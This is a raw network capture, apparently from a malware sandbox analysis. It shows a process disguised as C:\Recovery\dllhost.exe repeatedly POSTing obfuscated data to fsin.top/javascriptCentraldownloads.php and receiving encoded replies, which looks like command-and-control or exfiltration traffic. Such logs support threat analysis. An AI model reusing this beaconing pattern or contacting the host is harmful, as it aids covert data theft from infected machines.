                                                  Aug 1, 2024 07:37:55.459029913 CEST | 1012 | OUT | Data Raw: 54 56 5d 56 5a 5b 5d 54 5c 5e 5a 51 54 57 57 53 57 5e 5e 5c 56 58 51 5e 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TV]VZ[]T\^ZQTWWSW^^\VXQ^[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S!'T9_"[7&5](])):^%;8114/'!+;Y&&G#.X!
                                                  Aug 1, 2024 07:37:55.548077106 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:37:55.783210993 CEST | 590 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:37:55 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FR2Lp9HKjfute6VgQq9pn7xzfsoW1i%2BT1EfqVP3%2FFqfJU%2FhLW4%2BLd8X2HIidsmdZkLs4D3JxvT%2FInsU89NV9zqRAJfa57ndzxIUmvNTU8R7zLsmxJVvg77vCkA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37aa1e82818ea-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  42 | 192.168.2.4 | 49778 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:37:55.914935112 CEST | 250 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Aug 1, 2024 07:37:56.271452904 CEST | 1012 | OUT | Data Raw: 51 57 5d 57 5a 59 58 53 5c 5e 5a 51 54 51 57 52 57 5f 5e 56 56 5d 51 5a 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QW]WZYXS\^ZQTQWRW_^VV]QZ[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S!%""6$36#]<6>6%17R&<.^%$,>;!/%&G#.X!
                                                  Aug 1, 2024 07:37:56.368602991 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:37:56.518285990 CEST | 582 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:37:56 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=idH4CwXNrioM7UyQABb2ffMV0om5nbdQk8inG6zR1IjJ2C6QJCPxjeMeKlFjvgRBWmz7vdUvvG4JeuF3zamhasHwyr60phKKAs7Oy51kKb2NG35P%2BDb8X%2BNukQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37aa70e5d41ff-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  43 | 192.168.2.4 | 49779 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:37:56.784178019 CEST | 250 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Aug 1, 2024 07:37:57.131007910 CEST | 1012 | OUT | Data Raw: 51 52 5d 57 5a 5a 58 51 5c 5e 5a 51 54 52 57 53 57 51 5e 59 56 58 51 54 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QR]WZZXQ\^ZQTRWSWQ^YVXQT[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"X31"![#35?*W)C&]%V%51 (S/0!;'X&5&G#.X!4
                                                  Aug 1, 2024 07:37:57.203438997 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:37:57.426067114 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:37:57.494865894 CEST | 582 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:37:57 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dhRgSrIQXt%2FFM04dYFgYSnqbne3xAZ4C9QYFOFa1u5EAZmNRWCrmnfV8B%2Bo63CyQRz3GjcVOV1y4v2WTq4lIozGB9RSxibw9o0Nq2XVXF8oZJI2Dw0lYe0VpnA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37aac38aec341-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  44 | 192.168.2.4 | 49780 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:37:57.619060040 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:37:57.974585056 CEST | 1012 | OUT | Data Raw: 54 54 5d 55 5f 5a 58 57 5c 5e 5a 51 54 52 57 53 57 54 5e 5e 56 54 51 5a 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TT]U_ZXW\^ZQTRWSWT^^VTQZ[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"^32-!.805#(2S*&1(',>& #,.'Y6;#%&G#.X!4
                                                  Aug 1, 2024 07:37:58.229167938 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:37:58.285984039 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:37:58.344213009 CEST | 580 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:37:58 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4uxTtsUnUA98V2HAFTtsOLdHn72q8lfP1tCqjlK52QWTrknx02vYl0ep0HkmcyJO2mWQ%2FWQvkmVILKhZH8blqfXi59XaNAmfZz7walNapIDx84g4lfeidYSPsA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37ab1aeef4339-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  45 | 192.168.2.4 | 49781 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:37:58.662492990 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:37:59.021516085 CEST | 1012 | OUT | Data Raw: 51 54 5d 56 5a 5f 5d 56 5c 5e 5a 51 54 54 57 57 57 56 5e 5f 56 54 51 54 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QT]VZ_]V\^ZQTTWWWV^_VTQT[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S!0!*5 35)81=5)2#V%.Z&U<T,=#^!7%&G#.X!,
                                                  Aug 1, 2024 07:37:59.130960941 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:37:59.457271099 CEST | 586 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:37:59 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xU56dVYvdI9eM%2FIjISi87RYa6t0dyXBYnmI8Vbfmtnof%2BpOgTcpJrhd0%2B2rtl3HgnfDXN3i%2FVA7hr3UF9bwwxEokgWU9f21m5leHvUVteGzI1Z4Ft5jEYuiGlQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37ab84a7b434a-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  46 | 192.168.2.4 | 49782 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:37:59.643023968 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:37:59.990205050 CEST | 1012 | OUT | Data Raw: 54 55 58 56 5a 5d 58 50 5c 5e 5a 51 54 5f 57 51 57 56 5e 5c 56 5a 51 5c 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TUXVZ]XP\^ZQT_WQWV^\VZQ\[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"01=]!\0S<+8*U?6&Y&V&?%#U,.3X#8;%%&G#.X!
                                                  Aug 1, 2024 07:38:00.087614059 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:00.338367939 CEST | 586 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:00 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X04bWdGsW7%2Bc27INyQoamGh1oUQdu298uFMoM32V7UMo7EuP%2BgflBLOoX58hATzHf1XfD%2FfWLnv9GZIGyuc%2BflhRMKXb2zv29VHbmqhNpfJEVfLanUdF95lgEA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37abe4884421f-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  47 | 192.168.2.4 | 49783 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:00.474445105 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1008
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  48 | 192.168.2.4 | 49784 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:00.700536966 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1284
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:01.052799940 CEST | 1284 | OUT | Data Raw: 51 57 5d 50 5f 59 5d 51 5c 5e 5a 51 54 53 57 53 57 51 5e 59 56 5f 51 5c 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QW]P_Y]Q\^ZQTSWSWQ^YV_Q\[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S!$"_6>4';?]>R?%:Y%;<'<=&U3;X']61&G#.X!0
                                                  Aug 1, 2024 07:38:01.154689074 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:01.308494091 CEST | 735 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:01 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rx9teTOOYNmKmvNbEpWd9Ir7wHu7WdpNp5h4V8bjkkh4cE9tvQmDBgyFoF%2FC5%2BB3%2Fab2x8pDkkei%2FsH6dQzjm2NhK8zYq9YimdCphmdOphxF5Q5Q4qBrXNksbQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37ac4ef8c430a-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 39 38 0d 0a 02 1f 22 1e 24 2b 26 1d 36 3a 0e 54 29 0c 00 08 3d 33 3b 07 28 39 2b 59 26 2c 29 58 25 2b 3b 0a 35 05 31 58 30 11 26 54 27 31 32 5b 2a 1d 21 51 04 11 26 5c 23 1d 2e 1b 2b 39 38 05 33 06 20 03 20 50 3f 02 33 33 25 1e 21 07 34 15 3e 54 3e 01 2b 0c 0d 11 39 05 23 1a 28 33 20 11 27 36 2a 56 0d 17 21 0c 2e 06 38 1d 27 1c 3f 0e 23 2c 2c 0e 34 02 3d 59 3d 3c 22 5d 3d 27 39 01 39 0a 3f 11 3e 1d 07 0f 2b 13 0b 5e 2b 03 25 55 27 13 22 5d 2c 03 2d 48 0e 3d 59 4d 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 98"$+&6:T)=3;(9+Y&,)X%+;51X0&T'12[*!Q&\#.+983 P?33%!4>T>+9#(3 '6*V!.8'?#,,4=Y=<"]='99?>+^+%U'"],-H=YM0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  49 | 192.168.2.4 | 49785 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:00.819988012 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:01.177891016 CEST | 1012 | OUT | Data Raw: 54 55 5d 50 5a 5f 5d 53 5c 5e 5a 51 54 57 57 57 57 54 5e 5b 56 5f 51 59 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TU]PZ_]S\^ZQTWWWWT^[V_QY[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"Y3!^!=405/<(5>5]&8&?&20T;/5;+\25&G#.X!
                                                  Aug 1, 2024 07:38:01.286986113 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:01.529917002 CEST | 580 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:01 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6uenyX79qQltqqxiYSxAjSgeWWPpXL5PP4YH6IH3r1lJCAQwCoyewRTVrWyOrhZXuFgkkRWh7qaKfPXxy3%2B8ODv8WIdBWnHIwWIxBLRy0uEmXWUbr4Zy5vKm1Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37ac5ba9b42b8-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  50 | 192.168.2.4 | 49786 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:01.814718962 CEST | 250 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Aug 1, 2024 07:38:02.162936926 CEST | 1012 | OUT | Data Raw: 54 57 58 51 5a 58 5d 56 5c 5e 5a 51 54 50 57 54 57 5e 5e 57 56 5e 51 59 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TWXQZX]V\^ZQTPWTW^^WV^QY[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"X'2!3&#_<==!%;#Q'/51,, "+^25&G#.X!<
                                                  Aug 1, 2024 07:38:02.292803049 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:02.545291901 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:02.545308113 CEST | 590 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:02 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QfB96tpdDbmRjkLNuMUL%2B55xaro7pqv4i2y%2Bhp%2FX2%2FpsImp7OtLKBqhgJCWQn1kmRTOXw0XgAoUeMMmtTKH8WLa76IxrMEEAGkA9kSFAMokM%2FZhze%2FecAzmV1g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37acc098ac32c-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  51 | 192.168.2.4 | 49787 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:02.843832016 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:03.193373919 CEST | 1012 | OUT | Data Raw: 54 51 58 55 5a 5e 58 55 5c 5e 5a 51 54 53 57 5a 57 55 5e 57 56 54 51 55 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TQXUZ^XU\^ZQTSWZWU^WVTQU[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"X32-Z" 35Y(>R?&>%42/-$30T;>!;(%&G#.X!0
                                                  Aug 1, 2024 07:38:03.292035103 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:03.566277027 CEST | 586 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:03 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u%2FXb8eakzk%2F7HAWpW7z3Wy0qaZKAlBtF56C3KzvMdwsbNLi7jNmuM5R%2FXim2urRdYteetDJAX8OJlrMcypai7EemjrCWE6z5EG1U%2FIArg3xMV6GJ2ZZFQFbgsA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37ad24e3b8c75-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  52 | 192.168.2.4 | 49788 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:03.754669905 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:04.100296021 CEST1012OUTData Raw: 51 53 58 54 5f 59 58 53 5c 5e 5a 51 54 52 57 54 57 5f 5e 5b 56 5b 51 59 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
